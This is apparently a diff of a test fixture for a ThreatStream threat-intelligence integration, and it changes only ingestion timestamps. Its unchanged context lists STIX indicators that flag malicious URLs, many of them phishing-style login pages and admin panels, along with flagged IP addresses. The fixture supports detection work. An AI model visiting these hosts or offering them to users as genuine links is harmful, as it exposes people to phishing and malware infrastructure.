'89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T03:00:01.726Z\"}", "category": "threat", "type": "indicator", @@ -3725,7 +3725,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022991700Z", + "ingested": "2021-12-14T14:57:43.118187447Z", "original": "{\"created\":\"2020-01-24T03:00:01.762Z\",\"description\":\"TS ID: 55250078011; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--0e10924c-745c-4a58-8e27-ab3a6bacd666\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-58\"],\"modified\":\"2020-01-24T03:00:01.762Z\",\"name\":\"mal_url: http://tavim.org/includes/firmino/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://tavim.org/includes/firmino/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T03:00:01.762Z\"}", "category": "threat", "type": "indicator", @@ -3776,7 +3776,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.022999400Z", + "ingested": "2021-12-14T14:57:43.118188008Z", "original": "{\"created\":\"2020-01-24T03:00:10.928Z\",\"description\":\"TS ID: 55250078015; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--c3fb816a-cc3b-4442-be4d-d62113ae5168\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-01-24T03:00:10.928Z\",\"name\":\"mal_url: http://onlinesecuritycenter.xyz/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://onlinesecuritycenter.xyz/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T03:00:10.928Z\"}", "category": "threat", "type": "indicator", @@ -3828,7 +3828,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023006700Z", + "ingested": "2021-12-14T14:57:43.118188508Z", "original": "{\"created\":\"2020-01-24T03:00:20.166Z\",\"description\":\"TS ID: 55250078029; iType: mal_url; State: active; Org: IT House, Ltd; Source: CyberCrime\",\"id\":\"indicator--9159e46d-f3a4-464b-ac68-8beaf87e1a8f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-01-24T03:00:20.166Z\",\"name\":\"mal_url: http://oaa-my.com/cutter/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://oaa-my.com/cutter/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T03:00:20.166Z\"}", "category": "threat", "type": "indicator", @@ -3879,7 +3879,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023014300Z", + "ingested": "2021-12-14T14:57:43.118189004Z", "original": "{\"created\":\"2020-01-24T03:00:24.048Z\",\"description\":\"TS ID: 55250078016; iType: mal_url; State: active; Source: CyberCrime\",\"id\":\"indicator--fefa8e76-ae0f-41ab-84e7-ea43ab055573\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-24T03:00:24.048Z\",\"name\":\"mal_url: http://jumbajumbadun.fun/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://jumbajumbadun.fun/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T03:00:24.048Z\"}", "category": "threat", "type": "indicator", @@ -3931,7 +3931,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023021700Z", + "ingested": "2021-12-14T14:57:43.118189442Z", "original": "{\"created\":\"2020-01-24T03:00:55.816Z\",\"description\":\"TS ID: 55250078024; iType: mal_url; State: active; Org: CyrusOne LLC; Source: CyberCrime\",\"id\":\"indicator--6a76fa89-4d5f-40d0-9b03-671bdb2d5b4b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-58\"],\"modified\":\"2020-01-24T03:00:55.816Z\",\"name\":\"mal_url: http://tavim.org/includes/salah/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://tavim.org/includes/salah/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T03:00:55.816Z\"}", "category": "threat", "type": "indicator", @@ -3982,7 +3982,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023026900Z", + "ingested": "2021-12-14T14:57:43.118189890Z", "original": "{\"created\":\"2020-01-24T03:01:10.501Z\",\"description\":\"TS ID: 55250078022; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--21055dfd-d0cb-42ec-93bd-ffaeadd11d80\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-80\"],\"modified\":\"2020-01-24T03:01:10.501Z\",\"name\":\"mal_url: http://l0c23205.justinstalledpanel.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://l0c23205.justinstalledpanel.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T03:01:10.501Z\"}", "category": "threat", "type": "indicator", @@ -4033,7 +4033,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023032900Z", + "ingested": "2021-12-14T14:57:43.118190420Z", "original": "{\"created\":\"2020-01-24T03:01:10.518Z\",\"description\":\"TS ID: 55250078021; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--7471a595-e8b0-4c41-be4c-0a3e55675630\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-01-24T03:01:10.518Z\",\"name\":\"mal_url: http://l535e9e5.justinstalledpanel.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://l535e9e5.justinstalledpanel.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T03:01:10.518Z\"}", "category": "threat", "type": "indicator", @@ -4078,7 +4078,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023040600Z", + "ingested": "2021-12-14T14:57:43.118190807Z", "original": "{\"created\":\"2020-01-24T03:01:14.843Z\",\"description\":\"TS ID: 55250078007; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--ead1e7e5-fdb3-47c2-9476-aa82741c038e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-76\"],\"modified\":\"2020-01-24T03:01:14.843Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-24T03:01:14.843Z\"}", "category": "threat", "type": "indicator", @@ -4129,7 +4129,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023048Z", + "ingested": "2021-12-14T14:57:43.118191190Z", "original": "{\"created\":\"2020-01-25T02:57:12.699Z\",\"description\":\"TS ID: 55253484365; iType: mal_url; State: active; Org: Petersburg Internet Network ltd.; Source: CyberCrime\",\"id\":\"indicator--b0aee6bf-32f4-4f65-8de6-f65e04e92b15\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-01-25T02:57:12.699Z\",\"name\":\"mal_url: http://89.160.20.156/northon/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/northon/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:57:12.699Z\"}", "category": "threat", "type": "indicator", @@ -4180,7 +4180,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023054600Z", + "ingested": "2021-12-14T14:57:43.118191696Z", "original": "{\"created\":\"2020-01-25T02:57:28.034Z\",\"description\":\"TS ID: 55253484350; iType: mal_url; State: active; Org: ColoCrossing; Source: CyberCrime\",\"id\":\"indicator--54afbceb-72f3-484e-aee4-904f77beeff6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-25T02:57:28.034Z\",\"name\":\"mal_url: http://89.160.20.156/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:57:28.034Z\"}", "category": "threat", "type": "indicator", @@ -4232,7 +4232,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023058200Z", + "ingested": "2021-12-14T14:57:43.118192328Z", "original": "{\"created\":\"2020-01-25T02:57:38.187Z\",\"description\":\"TS ID: 55253484356; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime\",\"id\":\"indicator--da030e10-af9f-462d-bda8-33abb223e950\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-01-25T02:57:38.187Z\",\"name\":\"mal_url: http://officelog.org/inc/js/jstree/scan/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://officelog.org/inc/js/jstree/scan/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:57:38.187Z\"}", "category": "threat", "type": "indicator", @@ -4283,7 +4283,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023062200Z", + "ingested": "2021-12-14T14:57:43.118192773Z", "original": "{\"created\":\"2020-01-25T02:57:38.214Z\",\"description\":\"TS ID: 55253484343; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--d38e051a-bc5b-4723-884a-65e017d98299\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-65\"],\"modified\":\"2020-01-25T02:57:38.214Z\",\"name\":\"mal_url: http://f0391587.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0391587.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:57:38.214Z\"}", "category": "threat", "type": "indicator", @@ -4335,7 +4335,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023067600Z", + "ingested": "2021-12-14T14:57:43.118193163Z", "original": "{\"created\":\"2020-01-25T02:57:47.281Z\",\"description\":\"TS ID: 55253484367; iType: mal_url; State: active; Org: Petersburg Internet Network ltd.; Source: CyberCrime\",\"id\":\"indicator--46491826-6ba1-4217-a35e-1eb0081a9e6a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-01-25T02:57:47.281Z\",\"name\":\"mal_url: http://89.160.20.156:8080/northon/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156:8080/northon/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:57:47.281Z\"}", "category": "threat", "type": "indicator", @@ -4386,7 +4386,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023075200Z", + "ingested": "2021-12-14T14:57:43.118193666Z", "original": "{\"created\":\"2020-01-25T02:57:51.296Z\",\"description\":\"TS ID: 55253484342; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--b9715fd5-b89a-4859-b19f-55e052709227\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-79\"],\"modified\":\"2020-01-25T02:57:51.296Z\",\"name\":\"mal_url: http://f0393086.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0393086.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:57:51.296Z\"}", "category": "threat", "type": "indicator", @@ -4438,7 +4438,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023079200Z", + "ingested": "2021-12-14T14:57:43.118194111Z", "original": "{\"created\":\"2020-01-25T02:57:56.007Z\",\"description\":\"TS ID: 55253484363; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--e3177515-f481-46c8-bad8-582ba0858ef3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-01-25T02:57:56.007Z\",\"name\":\"mal_url: http://insuncos.com/files1/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://insuncos.com/files1/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:57:56.007Z\"}", "category": "threat", "type": "indicator", @@ -4489,7 +4489,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023085300Z", + "ingested": "2021-12-14T14:57:43.118194550Z", "original": "{\"created\":\"2020-01-25T02:57:56.044Z\",\"description\":\"TS ID: 55253484339; iType: mal_url; State: active; Org: DDoS-GUARD GmbH; Source: CyberCrime\",\"id\":\"indicator--33cdeaeb-5201-4fbb-b9ae-9c23377e7533\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-01-25T02:57:56.044Z\",\"name\":\"mal_url: http://tg-h.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://tg-h.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:57:56.044Z\"}", "category": "threat", "type": "indicator", @@ -4541,7 +4541,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023090500Z", + "ingested": "2021-12-14T14:57:43.118195076Z", "original": "{\"created\":\"2020-01-25T02:58:11.038Z\",\"description\":\"TS ID: 55253484351; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--2baaa5f0-c2f6-4bd1-b59d-3a75931da735\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-01-25T02:58:11.038Z\",\"name\":\"mal_url: http://wusetwo.xyz/public_html/file/five/inc/class/pCharts/info/Panel/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://wusetwo.xyz/public_html/file/five/inc/class/pCharts/info/Panel/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:58:11.038Z\"}", "category": "threat", "type": "indicator", @@ -4592,7 +4592,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023095100Z", + "ingested": "2021-12-14T14:57:43.118195528Z", "original": "{\"created\":\"2020-01-25T02:58:20.42Z\",\"description\":\"TS ID: 55253484366; iType: mal_url; State: active; Org: World Hosting Farm Limited; Source: CyberCrime\",\"id\":\"indicator--f1bdef49-666f-46b5-a323-efa1f1446b62\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-64\"],\"modified\":\"2020-01-25T02:58:20.42Z\",\"name\":\"mal_url: http://89.160.20.156/northon/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/northon/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:58:20.42Z\"}", "category": "threat", "type": "indicator", @@ -4644,7 +4644,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023100500Z", + "ingested": "2021-12-14T14:57:43.118195927Z", "original": "{\"created\":\"2020-01-25T02:58:20.448Z\",\"description\":\"TS ID: 55253484354; iType: mal_url; State: active; Org: McHost.Ru; Source: CyberCrime\",\"id\":\"indicator--a173f4b1-67ce-44f8-a6d0-bd8a24e8c593\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-84\"],\"modified\":\"2020-01-25T02:58:20.448Z\",\"name\":\"mal_url: http://topik07.mcdir.ru/papka/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://topik07.mcdir.ru/papka/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:58:20.448Z\"}", "category": "threat", "type": "indicator", @@ -4696,7 +4696,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023105800Z", + "ingested": "2021-12-14T14:57:43.118196322Z", "original": "{\"created\":\"2020-01-25T02:58:33.189Z\",\"description\":\"TS ID: 55253484362; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--b53dded1-d293-4cd1-9e63-b6e0cbd850f0\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-01-25T02:58:33.189Z\",\"name\":\"mal_url: http://insuncos.com/files2/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://insuncos.com/files2/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:58:33.189Z\"}", "category": "threat", "type": "indicator", @@ -4747,7 +4747,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023110400Z", + "ingested": "2021-12-14T14:57:43.118196759Z", "original": "{\"created\":\"2020-01-25T02:58:49.056Z\",\"description\":\"TS ID: 55253484364; iType: mal_url; State: active; Org: World Hosting Farm Limited; Source: CyberCrime\",\"id\":\"indicator--2b30f8fe-13e8-4a7d-8eba-3e59c288bef7\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-47\"],\"modified\":\"2020-01-25T02:58:49.056Z\",\"name\":\"mal_url: http://89.160.20.156/kaspersky/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/kaspersky/']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:58:49.056Z\"}", "category": "threat", "type": "indicator", @@ -4799,7 +4799,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023116100Z", + "ingested": "2021-12-14T14:57:43.118197211Z", "original": "{\"created\":\"2020-01-25T02:58:59.472Z\",\"description\":\"TS ID: 55253484357; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime\",\"id\":\"indicator--f502199a-17a4-404b-a114-fb5eda28c32c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-01-25T02:58:59.472Z\",\"name\":\"mal_url: http://officelog.org/inc/js/jstree/mh/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://officelog.org/inc/js/jstree/mh/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:58:59.472Z\"}", "category": "threat", "type": "indicator", @@ -4851,7 +4851,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023123700Z", + "ingested": "2021-12-14T14:57:43.118197719Z", "original": "{\"created\":\"2020-01-25T02:59:27.07Z\",\"description\":\"TS ID: 55253484359; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime\",\"id\":\"indicator--af7422eb-5d8e-4878-bdd1-395313434dae\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-01-25T02:59:27.07Z\",\"name\":\"mal_url: http://officelog.org/inc/js/jstree/ch/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://officelog.org/inc/js/jstree/ch/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:59:27.07Z\"}", "category": "threat", "type": "indicator", @@ -4903,7 +4903,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023131300Z", + "ingested": "2021-12-14T14:57:43.118198333Z", "original": "{\"created\":\"2020-01-25T02:59:28.967Z\",\"description\":\"TS ID: 55253484358; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime\",\"id\":\"indicator--71b36c05-86dd-4685-81c0-5a99e2e14c23\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-01-25T02:59:28.967Z\",\"name\":\"mal_url: http://officelog.org/inc/js/jstree/dar/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://officelog.org/inc/js/jstree/dar/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:59:28.967Z\"}", "category": "threat", "type": "indicator", @@ -4955,7 +4955,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023136900Z", + "ingested": "2021-12-14T14:57:43.118198770Z", "original": "{\"created\":\"2020-01-25T02:59:37.661Z\",\"description\":\"TS ID: 55253484352; iType: mal_url; State: active; Org: Best-Hoster Group Co. Ltd.; Source: CyberCrime\",\"id\":\"indicator--9d948509-dfb4-45b6-b8bc-780df88a213f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-81\"],\"modified\":\"2020-01-25T02:59:37.661Z\",\"name\":\"mal_url: http://oaa-my.com/cage/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://oaa-my.com/cage/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:59:37.661Z\"}", "category": "threat", "type": "indicator", @@ -5000,7 +5000,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023140500Z", + "ingested": "2021-12-14T14:57:43.118199292Z", "original": "{\"created\":\"2020-01-25T02:59:37.692Z\",\"description\":\"TS ID: 55253484224; iType: mal_ip; State: active; Org: Namecheap; Source: CyberCrime\",\"id\":\"indicator--9f613f8e-2040-4eee-8044-044023a8093e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-53\"],\"modified\":\"2020-01-25T02:59:37.692Z\",\"name\":\"mal_ip: 192.168.118.56\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '192.168.118.56']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:59:37.692Z\"}", "category": "threat", "type": "indicator", @@ -5052,7 +5052,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023144500Z", + "ingested": "2021-12-14T14:57:43.118199736Z", "original": "{\"created\":\"2020-01-25T02:59:54.296Z\",\"description\":\"TS ID: 55253484361; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--518c3959-6c26-413f-9a5f-c8f76d86185a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-01-25T02:59:54.296Z\",\"name\":\"mal_url: http://insuncos.com/files3/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://insuncos.com/files3/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:59:54.296Z\"}", "category": "threat", "type": "indicator", @@ -5103,7 +5103,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023149600Z", + "ingested": "2021-12-14T14:57:43.118200126Z", "original": "{\"created\":\"2020-01-25T02:59:57.748Z\",\"description\":\"TS ID: 55253484347; iType: mal_url; State: active; Org: Beget Ltd; Source: CyberCrime\",\"id\":\"indicator--625b94ec-2304-4502-a2eb-59d52cdb9c1f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-80\"],\"modified\":\"2020-01-25T02:59:57.748Z\",\"name\":\"mal_url: http://t95212tt.beget.tech/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://t95212tt.beget.tech/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T02:59:57.748Z\"}", "category": "threat", "type": "indicator", @@ -5154,7 +5154,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023155200Z", + "ingested": "2021-12-14T14:57:43.118200745Z", "original": "{\"created\":\"2020-01-25T03:00:22.168Z\",\"description\":\"TS ID: 55253484349; iType: mal_url; State: active; Org: IT DeLuxe Ltd.; Source: CyberCrime\",\"id\":\"indicator--c8f76b97-051f-4fab-b57f-a57f37480aa0\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-90\"],\"modified\":\"2020-01-25T03:00:22.168Z\",\"name\":\"mal_url: http://kiototan.site/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://kiototan.site/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T03:00:22.168Z\"}", "category": "threat", "type": "indicator", @@ -5199,7 +5199,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023159400Z", + "ingested": "2021-12-14T14:57:43.118201224Z", "original": "{\"created\":\"2020-01-25T03:00:27.279Z\",\"description\":\"TS ID: 55253484353; iType: mal_ip; State: active; Org: Com Telecom; Source: CyberCrime\",\"id\":\"indicator--7abc3f41-e952-481f-8bf7-7b52af05451f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-62\"],\"modified\":\"2020-01-25T03:00:27.279Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T03:00:27.279Z\"}", "category": "threat", "type": "indicator", @@ -5250,7 +5250,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023165800Z", + "ingested": "2021-12-14T14:57:43.118201619Z", "original": "{\"created\":\"2020-01-25T03:00:29.248Z\",\"description\":\"TS ID: 55253484340; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--72334129-8d1c-4cac-bde6-2d5d6316e266\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-82\"],\"modified\":\"2020-01-25T03:00:29.248Z\",\"name\":\"mal_url: http://newfoundfriend.xyz/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://newfoundfriend.xyz/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T03:00:29.248Z\"}", "category": "threat", "type": "indicator", @@ -5302,7 +5302,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023170Z", + "ingested": "2021-12-14T14:57:43.118202066Z", "original": "{\"created\":\"2020-01-25T03:01:03.628Z\",\"description\":\"TS ID: 55253484360; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime\",\"id\":\"indicator--a3f8f1e3-77c5-442d-a918-5d3d800a8357\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-01-25T03:01:03.628Z\",\"name\":\"mal_url: http://officelog.org/inc/js/jstree/bi/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://officelog.org/inc/js/jstree/bi/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T03:01:03.628Z\"}", "category": "threat", "type": "indicator", @@ -5354,7 +5354,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023174400Z", + "ingested": "2021-12-14T14:57:43.118202628Z", "original": "{\"created\":\"2020-01-25T03:01:03.65Z\",\"description\":\"TS ID: 55253484355; iType: mal_url; State: active; Org: Namecheap; Source: CyberCrime\",\"id\":\"indicator--49bac194-cefe-4c31-81eb-cc81a3a3bb26\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-89\"],\"modified\":\"2020-01-25T03:01:03.65Z\",\"name\":\"mal_url: http://officelog.org/inc/js/jstree/vic/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://officelog.org/inc/js/jstree/vic/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-01-25T03:01:03.65Z\"}", "category": "threat", "type": "indicator", @@ -5405,7 +5405,7 @@ } }, "event": { - "ingested": "2021-12-13T08:38:40.023178Z", + "ingested": 